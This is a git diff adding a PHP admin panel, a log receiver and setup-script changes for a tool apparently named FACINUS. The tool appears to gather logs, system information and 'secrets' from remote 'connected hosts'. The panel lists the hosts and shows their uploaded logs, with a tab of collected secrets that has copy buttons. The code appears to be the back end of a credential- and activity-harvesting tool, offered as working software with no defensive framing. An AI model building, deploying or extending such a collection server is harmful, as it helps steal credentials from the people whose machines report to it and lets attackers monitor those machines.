+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>FACINUS - Admin</title>
+    <link rel="stylesheet" href="styles.css">
+</head>
+<body>
+    <div class="container">
+        <div class="header">
+            <a href="admin.php" class="logo">
+                <pre class="ascii-header">
+  █████▒▄▄▄       ▄████▄   ██▓ ███▄    █  █    ██   ██████ 
+▓██   ▒▒████▄    ▒██▀ ▀█  ▓██▒ ██ ▀█   █  ██  ▓██▒▒██    ▒ 
+▒████ ░▒██  ▀█▄  ▒▓█    ▄ ▒██▒▓██  ▀█ ██▒▓██  ▒██░░ ▓██▄   
+░▓█▒  ░░██▄▄▄▄██ ▒▓▓▄ ▄██▒░██░▓██▒  ▐▌██▒▓▓█  ░██░  ▒   ██▒
+░▒█░    ▓█   ▓██▒▒ ▓███▀ ░░██░▒██░   ▓██░▒▒█████▓ ▒██████▒▒
+ ▒ ░    ▒▒   ▓▒█░░ ░▒ ▒  ░░▓  ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░
+ ░       ▒   ▒▒ ░  ░  ▒    ▒ ░░ ░░   ░ ▒░░░▒░ ░ ░ ░ ░▒  ░ ░
+ ░ ░     ░   ▒   ░         ▒ ░   ░   ░ ░  ░░░ ░ ░ ░  ░  ░  
+             ░  ░░ ░       ░           ░    ░           ░  
+                 ░                                         
+ admin panel
+                </pre>
+            </a>
+            <?php if ($authenticated): ?>
+                <a href="?logout=1" class="logout">logout</a>
+            <?php endif; ?>
+        </div>
+
+        <?php if (!$authenticated): ?>
+            <div class="login">
+                <h2>> login</h2>
+                <?php if (isset($login_error)): ?>
+                    <div class="alert"><?php echo $login_error; ?></div>
+                <?php endif; ?>
+                <form method="post">
+                    <label for="password">password:</label>
+                    <input type="password" id="password" name="password" required autofocus>
+                    <button type="submit">access</button>
+                </form>
+            </div>
+        <?php else: ?>
+            <div class="dashboard">
+                <div class="sidebar">
+                    <div class="panel">
+                        <div class="panel-header">
+                            <h3>> hosts</h3>
+                        </div>
+                        <?php if (count($hosts) > 0): ?>
+                            <input type="text" id="hostSearch" placeholder="search..." class="search-box">
+                            <ul class="host-list">
+                                <?php foreach ($hosts as $host): ?>
+                                    <li>
+                                        <a href="?host=<?php echo urlencode($host); ?>" class="<?php echo isset($_GET['host']) && $_GET['host'] === $host ? 'active' : ''; ?>">
+                                            <?php echo htmlspecialchars($host); ?>
+                                        </a>
+                                    </li>
+                                <?php endforeach; ?>
+                            </ul>
+                        <?php else: ?>
+                            <div class="welcome">
+                                <p>no connected hosts</p>
+                            </div>
+                        <?php endif; ?>
+                    </div>
+                </div>
+                
+                <div class="content">
+                    <?php if (isset($_GET['host'])): ?>
+                        <div class="panel">
+                            <div class="panel-header">
+                                <h2>> <?php echo htmlspecialchars(basename($_GET['host'])); ?></h2>
+                                <?php if ($current_log): ?>
+                                    <button class="action-btn" id="downloadBtn">download</button>
+                                    <button class="action-btn" id="refreshBtn">refresh</button>
+                                <?php endif; ?>
+                            </div>
+                            
+                            <div class="tabs">
+                                <a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>" class="tab <?php echo !isset($_GET['info']) && !isset($_GET['secrets']) ? 'active' : ''; ?>">
+                                    logs
+                                </a>
+                                <a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>&info=system" class="tab <?php echo isset($_GET['info']) && $_GET['info'] === 'system' ? 'active' : ''; ?>">
+                                    system
+                                </a>
+                                <a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>&secrets=1" class="tab <?php echo isset($_GET['secrets']) ? 'active' : ''; ?>">
+                                    secrets
+                                </a>
+                            </div>
+                            
+                            <?php if (isset($_GET['secrets'])): ?>
+                                <div class="secrets">
+                                    <?php if (count($secrets) > 0): ?>
+                                        <?php foreach ($secrets as $type => $value): ?>
+                                            <div class="secret">
+                                                <div class="secret-title">
+                                                    > <?php echo htmlspecialchars(str_replace('_', ' ', $type)); ?>
+                                                </div>
+                                                <div class="command">
+                                                    <?php echo htmlspecialchars($value); ?>
+                                                    <button class="copy-btn" data-clipboard="<?php echo htmlspecialchars($value); ?>">
+                                                        copy
+                                                    </button>
+                                                </div>
+                                            </div>
+                                        <?php endforeach; ?>
+                                    <?php else: ?>
+                                        <div class="welcome">
+                                            <p>no secrets collected from this host</p>
+                                        </div>
+                                    <?php endif; ?>
+                                </div>
+                            <?php elseif (isset($_GET['info']) && $_GET['info'] === 'system'): ?>
+                                <div class="system-info">
+                                    <?php if ($system_info): ?>
+                                        <table class="info-table">
+                                            <?php foreach ($system_info as $key => $value): ?>
+                                                <tr>
+                                                    <td class="info-label"><?php echo htmlspecialchars(str_replace('_', ' ', $key)); ?></td>
+                                                    <td><?php echo htmlspecialchars($value); ?></td>
+                                                </tr>
+                                            <?php endforeach; ?>
+                                        </table>
+                                    <?php else: ?>
+                                        <div class="welcome">
+                                            <p>no system information collected</p>
+                                        </div>
+                                    <?php endif; ?>
+                                </div>
+                            <?php else: ?>
+                                <?php if ($current_log): ?>
+                                    <div class="logs">
+                                        <?php echo htmlspecialchars($log_content); ?>
+                                    </div>
+                                <?php elseif (count($host_logs) > 0): ?>
+                                    <input type="text" id="logSearch" placeholder="search..." class="search-box">
+                                    <ul class="log-list">
+                                        <?php foreach ($host_logs as $log_file): ?>
+                                            <?php 
+                                                $host = basename($_GET['host']);
+                                                $log_time = filemtime($logs_dir . "/" . $host . "/" . $log_file);
+                                                $log_date = date("Y-m-d H:i:s", $log_time);
+                                            ?>
+                                            <li>
+                                                <a href="?host=<?php echo urlencode($host); ?>&log=<?php echo urlencode($log_file); ?>">
+                                                    <?php echo htmlspecialchars($log_file); ?>
+                                                    <span class="log-date"><?php echo $log_date; ?></span>
+                                                </a>
+                                            </li>
+                                        <?php endforeach; ?>                                    </ul>
+                                <?php else: ?>
+                                    <div class="welcome">
+                                        <p>no logs available</p>
+                                    </div>
+                                <?php endif; ?>
+                            <?php endif; ?>
+                        </div>
+                    <?php else: ?>
+                        <div class="welcome">
+                            <p>select a host to view details</p>
+                        </div>
+                    <?php endif; ?>
+                </div>
+            </div>
+        <?php endif; ?>
+    </div>
+
+    <script src="scripts.js"></script>
+</body>
+</html>
diff --git a/web/admin/scripts.js b/web/admin/scripts.js
new file mode 100644
index 0000000..b29e9f4
--- /dev/null
+++ b/web/admin/scripts.js
@@ -0,0 +1,63 @@
+// Copy to clipboard functionality
+document.addEventListener('click', function(e) {
+    if (e.target && e.target.classList.contains('copy-btn')) {
+        const text = e.target.getAttribute('data-clipboard');
+        navigator.clipboard.writeText(text).then(function() {
+            const originalText = e.target.innerText;
+            e.target.innerText = "copied!";
+            setTimeout(() => {
+                e.target.innerText = originalText;
+            }, 1000);
+        });
+    }
+});
+
+// Search functionality
+function setupSearch(inputId, itemsSelector) {
+    const searchInput = document.getElementById(inputId);
+    if (searchInput) {
+        searchInput.addEventListener('input', function() {
+            const query = this.value.toLowerCase();
+            const items = document.querySelectorAll(itemsSelector);
+            
+            items.forEach(item => {
+                const text = item.textContent.toLowerCase();
+                item.parentNode.style.display = text.includes(query) ? 'block' : 'none';
+            });
+        });
+    }
+}
+
+// Setup search functionality if elements exist
+setupSearch('hostSearch', '.host-list a');
+setupSearch('logSearch', '.log-list a');
+
+// Download button functionality
+const downloadBtn = document.getElementById('downloadBtn');
+if (downloadBtn) {
+    downloadBtn.addEventListener('click', function() {
+        const logContent = document.querySelector('.logs');
+        if (logContent) {
+            const content = logContent.innerText;
+            const blob = new Blob([content], {type: 'text/plain'});
+            const url = URL.createObjectURL(blob);
+            
+            const a = document.createElement('a');
+            a.href = url;
+            const urlParams = new URLSearchParams(window.location.search);
+            a.download = urlParams.get('log') || "log";
+            document.body.appendChild(a);
+            a.click();
+            document.body.removeChild(a);
+            URL.revokeObjectURL(url);
+        }
+    });
+}
+
+// Refresh button functionality
+const refreshBtn = document.getElementById('refreshBtn');
+if (refreshBtn) {
+    refreshBtn.addEventListener('click', function() {
+        location.reload();
+    });
+}
diff --git a/web/admin/styles.css b/web/admin/styles.css
new file mode 100644
index 0000000..741d372
--- /dev/null
+++ b/web/admin/styles.css
@@ -0,0 +1,276 @@
+:root {
+    --bg: #111111;
+    --text: #33ff33;
+    --text-dim: #1a991a;
+    --secondary: #aaaaaa;
+    --accent: #ff5555;
+    --border: #333333;
+    --hover: #222222;
+    --panel: #191919;
+}
+
+* {
+    box-sizing: border-box;
+    margin: 0;
+    padding: 0;
+}
+
+body {
+    font-family: 'Courier New', monospace;
+    background-color: var(--bg);
+    color: var(--text);
+    line-height: 1.5;
+}
+
+.container {
+    width: 95%;
+    max-width: 1400px;
+    margin: 0 auto;
+    padding: 10px;
+}
+
+.header {
+    border-bottom: 1px solid var(--border);
+    padding: 10px 0;
+    margin-bottom: 20px;
+    display: flex;
+    justify-content: space-between;
+    align-items: center;
+}
+
+pre {
+    font-family: 'Courier New', monospace;
+    overflow-x: auto;
+    white-space: pre;
+}
+
+.ascii-header {
+    font-size: 12px;
+    line-height: 1.2;
+}
+
+.logo {
+    text-decoration: none;
+    color: var(--text);
+}
+
+.logout {
+    color: var(--text);
+    text-decoration: none;
+    border: 1px solid var(--border);
+    padding: 5px 10px;
+}
+
+.logout:hover {
+    background: var(--hover);
+}
+
+.dashboard {
+    display: flex;
+    gap: 20px;
+}
+
+.sidebar {
+    width: 280px;
+    flex-shrink: 0;
+}
+
+.content {
+    flex-grow: 1;
+}
+
+.panel {
+    border: 1px solid var(--border);
+    background: var(--panel);
+    margin-bottom: 20px;
+}
+
+.panel-header {
+    border-bottom: 1px solid var(--border);
+    padding: 10px;
+    display: flex;
+    justify-content: space-between;
+    align-items: center;
+}
+
+.host-list, .log-list {
+    list-style: none;
+}
+
+.host-list a, .log-list a, .tab {
+    display: block;
+    padding: 8px 10px;
+    color: var(--secondary);
+    text-decoration: none;
+    border-bottom: 1px solid var(--border);
+}
+
+.host-list a:hover, .log-list a:hover, .tab:hover {
+    background: var(--hover);
+    color: var(--text);
+}
+
+.host-list a.active, .log-list a.active, .tab.active {
+    color: var(--text);
+    background: rgba(51, 255, 51, 0.1);
+}
+
+.tabs {
+    display: flex;
+    border-bottom: 1px solid var(--border);
+}
+
+.tab {
+    padding: 8px 15px;
+    border-right: 1px solid var(--border);
+    border-bottom: none;
+}
+
+.logs {
+    padding: 10px;
+    max-height: 600px;
+    overflow: auto;
+    white-space: pre-wrap;
+    font-family: 'Courier New', monospace;
+    font-size: 14px;
+    background: rgba(0, 0, 0, 0.2);
+}
+
+.log-date {
+    float: right;
+    color: var(--text-dim);
+    font-size: 0.9em;
+}
+
+.login {
+    max-width: 400px;
+    margin: 50px auto;
+    padding: 20px;
+    border: 1px solid var(--border);
+    background: var(--panel);
+}
+
+input[type="password"], .search-box {
+    width: 100%;
+    padding: 8px;
+    margin: 10px 0;
+    background: var(--bg);
+    border: 1px solid var(--border);
+    color: var(--text);
+    font-family: 'Courier New', monospace;
+}
+
+button, .action-btn {
+    padding: 8px 15px;
+    background: transparent;
+    color: var(--text);
+    border: 1px solid var(--text);
+    cursor: pointer;
+    font-family: 'Courier New', monospace;
+}
+
+button:hover, .action-btn:hover {
+    background: rgba(51, 255, 51, 0.1);
+}
+
+.welcome {
+    text-align: center;
+    padding: 50px 20px;
+    color: var(--secondary);
+}
+
+.secrets {
+    padding: 10px;
+}
+
+.secret {
+    margin-bottom: 10px;
+    border: 1px solid var(--border);
+    background: rgba(255, 255, 0, 0.05);
+}
+
+.secret-title {
+    border-bottom: 1px dashed var(--border);
+    padding: 5px 8px;
+    font-size: 0.9em;
+    color: var(--text-dim);
+}
+
+.command {
+    padding: 8px;
+    position: relative;
+    overflow-x: auto;
+    white-space: pre;
+    font-family: 'Courier New', monospace;
+}
+
+.copy-btn {
+    position: absolute;
+    right: 5px;
+    top: 5px;
+    background: transparent;
+    color: var(--secondary);
+    border: 1px solid var(--border);
+    padding: 2px 5px;
+    cursor: pointer;
+    font-size: 12px;
+    width: auto;
+}
+
+.copy-btn:hover {
+    background: var(--hover);
+    color: var(--text);
+}
+
+.alert {
+    border-left: 3px solid var(--accent);
+    padding: 10px;
+    margin-bottom: 15px;
+    color: var(--accent);
+}
+
+.system-info {
+    padding: 10px;
+}
+
+.info-table {
+    width: 100%;
+    border-collapse: collapse;
+}
+
+.info-table tr {
+    border-bottom: 1px solid var(--border);
+}
+
+.info-table td {
+    padding: 8px 10px;
+}
+
+.info-label {
+    color: var(--secondary);
+    width: 150px;
+}
+
+.action-btn {
+    padding: 3px 8px;
+    font-size: 12px;
+    margin-left: 5px;
+}
+
+@media (max-width: 800px) {
+    .dashboard {
+        flex-direction: column;
+    }
+    
+    .sidebar {
+        width: 100%;
+    }
+    
+    .ascii-header {
+        font-size: 10px;
+    }
+    
+    .tabs {
+        flex-wrap: wrap;
+    }
+}
diff --git a/web/index.html b/web/index.html
index e53cfa1..cfc5a20 100644
--- a/web/index.html
+++ b/web/index.html
@@ -213,7 +213,7 @@
     </div>
 
     <h2>> admin</h2>
-    <a href="admin.php" class="admin-link">$ access admin panel</a>
+    <a href="admin/admin.php" class="admin-link">$ access admin panel</a>
     
 </body>
     <script>
diff --git a/web/log_receiver.php b/web/log_receiver.php
index 4baac23..34caa7e 100644
--- a/web/log_receiver.php
+++ b/web/log_receiver.php
@@ -4,8 +4,8 @@
 
 // Configuration
 $auth_token = "TOKEN_PLACEHOLDER"; // Will be replaced during installation
-$logs_dir = __DIR__ . "/logs";
-$secrets_dir = __DIR__ . "/secrets";
+$logs_dir = __DIR__ . "/admin/logs";
+$secrets_dir = __DIR__ . "/admin/secrets";
 
 // Verify authentication token
 if (!isset($_POST['auth_token']) || $_POST['auth_token'] !== $auth_token) {
@@ -33,7 +33,7 @@ if (!file_exists($host_secrets_dir)) {
 
 // Process the file upload if available
 if (isset($_FILES['log_data']) && $_FILES['log_data']['error'] === UPLOAD_ERR_OK) {
-    $log_file = $host_logs_dir . "/" . $timestamp . "_" . sanitize_filename($_FILES['log_data']['name']) . ".log";
+    $log_file = $host_logs_dir . "/" . $timestamp . "_" . sanitize_filename($_FILES['log_data']['name']);
     if (move_uploaded_file($_FILES['log_data']['tmp_name'], $log_file)) {
         // Process system info if provided
         if (!empty($system_info)) {
diff --git a/web/web_setup.sh b/web/web_setup.sh
index 65883a4..fe593ec 100755
--- a/web/web_setup.sh
+++ b/web/web_setup.sh
@@ -5,42 +5,42 @@ setup_web_server() {
     echo "Setting up web server..."
     
     # Create necessary directories
-    sudo mkdir -p "$SERVER_ROOT/logs"
-    sudo mkdir -p "$SERVER_ROOT/secrets"
+    sudo mkdir -p "$SERVER_ROOT/admin/logs"
+    sudo mkdir -p "$SERVER_ROOT/admin/secrets"
     
     # Set correct permissions
     case "$DISTRO" in
         arch)
-            sudo chown -R http:http "$SERVER_ROOT/logs"
-            sudo chown -R http:http "$SERVER_ROOT/secrets"
+            sudo chown -R http:http "$SERVER_ROOT/admin/logs"
+            sudo chown -R http:http "$SERVER_ROOT/admin/secrets"
             ;;
         debian|ubuntu)
-            sudo chown -R www-data:www-data "$SERVER_ROOT/logs"
-            sudo chown -R www-data:www-data "$SERVER_ROOT/secrets"
+            sudo chown -R www-data:www-data "$SERVER_ROOT/admin/logs"
+            sudo chown -R www-data:www-data "$SERVER_ROOT/admin/secrets"
             ;;
         redhat|fedora|centos)
-            sudo chown -R apache:apache "$SERVER_ROOT/logs"
-            sudo chown -R apache:apache "$SERVER_ROOT/secrets"
+            sudo chown -R apache:apache "$SERVER_ROOT/admin/logs"
+            sudo chown -R apache:apache "$SERVER_ROOT/admin/secrets"
             ;;
         *)
             # Try to guess the web server user
             if id -u http &>/dev/null; then
-                sudo chown -R http:http "$SERVER_ROOT/logs"
-                sudo chown -R http:http "$SERVER_ROOT/secrets"
+                sudo chown -R http:http "$SERVER_ROOT/admin/logs"
+                sudo chown -R http:http "$SERVER_ROOT/admin/secrets"
             elif id -u www-data &>/dev/null; then
-                sudo chown -R www-data:www-data "$SERVER_ROOT/logs"
-                sudo chown -R www-data:www-data "$SERVER_ROOT/secrets"
+                sudo chown -R www-data:www-data "$SERVER_ROOT/admin/logs"
+                sudo chown -R www-data:www-data "$SERVER_ROOT/admin/secrets"
             elif id -u apache &>/dev/null; then
-                sudo chown -R apache:apache "$SERVER_ROOT/logs"
-                sudo chown -R apache:apache "$SERVER_ROOT/secrets"
+                sudo chown -R apache:apache "$SERVER_ROOT/admin/logs"
+                sudo chown -R apache:apache "$SERVER_ROOT/admin/secrets"
             else
                 echo "Warning: Could not determine web server user. Setting default permissions."
             fi
             ;;
     esac
     
-    sudo chmod 750 "$SERVER_ROOT/logs"
-    sudo chmod 750 "$SERVER_ROOT/secrets"
+    sudo chmod 750 "$SERVER_ROOT/admin/logs"
+    sudo chmod 750 "$SERVER_ROOT/admin/secrets"
     
     # Copy web files
     copy_web_files
@@ -55,14 +55,14 @@ copy_web_files() {
     
     # Update configurations in files
     sudo sed -i "s/TOKEN_PLACEHOLDER/$SECRET_TOKEN/g" "$SERVER_ROOT/log_receiver.php"
-    sudo sed -i "s/ADMIN_PASSWORD_PLACEHOLDER/$ADMIN_PASSWORD/g" "$SERVER_ROOT/admin.php"
+    sudo sed -i "s/ADMIN_PASSWORD_PLACEHOLDER/$ADMIN_PASSWORD/g" "$SERVER_ROOT/admin/admin.php"
 
     # Update Server IP in the HTML files
     sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/index.html"
-    sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/admin.php"
+    sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/admin/admin.php"
     
     # Set proper permissions
-    sudo chmod 644 "$SERVER_ROOT/admin.php"
+    sudo chmod 644 "$SERVER_ROOT/admin/admin.php"
     sudo chmod 644 "$SERVER_ROOT/log_receiver.php"
 }
 configure_webserver() {
@@ -98,11 +98,11 @@ configure_apache_arch() {
         Require all granted
     </Directory>
     
-    <Directory "$SERVER_ROOT/logs">
+    <Directory "$SERVER_ROOT/admin/logs">
         Require all denied
     </Directory>
     
-    <Directory "$SERVER_ROOT/secrets">
+    <Directory "$SERVER_ROOT/admin/secrets">
         Require all denied
     </Directory>
     
@@ -140,11 +140,11 @@ configure_apache_debian() {
         Require all granted
     </Directory>
     
-    <Directory "$SERVER_ROOT/logs">
+    <Directory "$SERVER_ROOT/admin/logs">
         Require all denied
     </Directory>
     
-    <Directory "$SERVER_ROOT/secrets">
+    <Directory "$SERVER_ROOT/admin/secrets">
         Require all denied
     </Directory>
     
@@ -178,11 +178,11 @@ configure_apache_redhat() {
         Require all granted
     </Directory>
     
-    <Directory "$SERVER_ROOT/logs">
+    <Directory "$SERVER_ROOT/admin/logs">
         Require all denied
     </Directory>
     
-    <Directory "$SERVER_ROOT/secrets">
+    <Directory "$SERVER_ROOT/admin/secrets">
         Require all denied
     </Directory>
     
@@ -194,6 +194,5 @@ EOF
     sudo mv "$TEMP_DIR/deployment.conf" /etc/httpd/conf.d/deployment.conf
     
     # Start/restart Apache
-    sudo systemctl enable httpd
     sudo systemctl restart httpd
 }